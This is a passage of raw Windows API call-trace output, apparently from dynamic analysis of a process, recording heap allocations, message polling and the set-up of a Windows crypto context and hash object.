[0226.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0226.074] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0226.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.075] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.075] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.075] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0226.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0226.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.075] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.075] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0226.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0226.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0226.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.076] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.076] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.076] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.077] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0226.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0226.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.077] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0226.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0226.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.078] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.078] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0226.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.078] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0226.078] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0226.078] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.078] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0226.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0226.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.239] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.240] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.240] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0226.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.240] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0226.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0226.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.241] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0226.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0226.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0226.241] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0226.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0226.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0226.242] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0226.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0226.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0226.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0226.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0226.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0226.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0226.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0226.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0226.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0226.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0226.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, 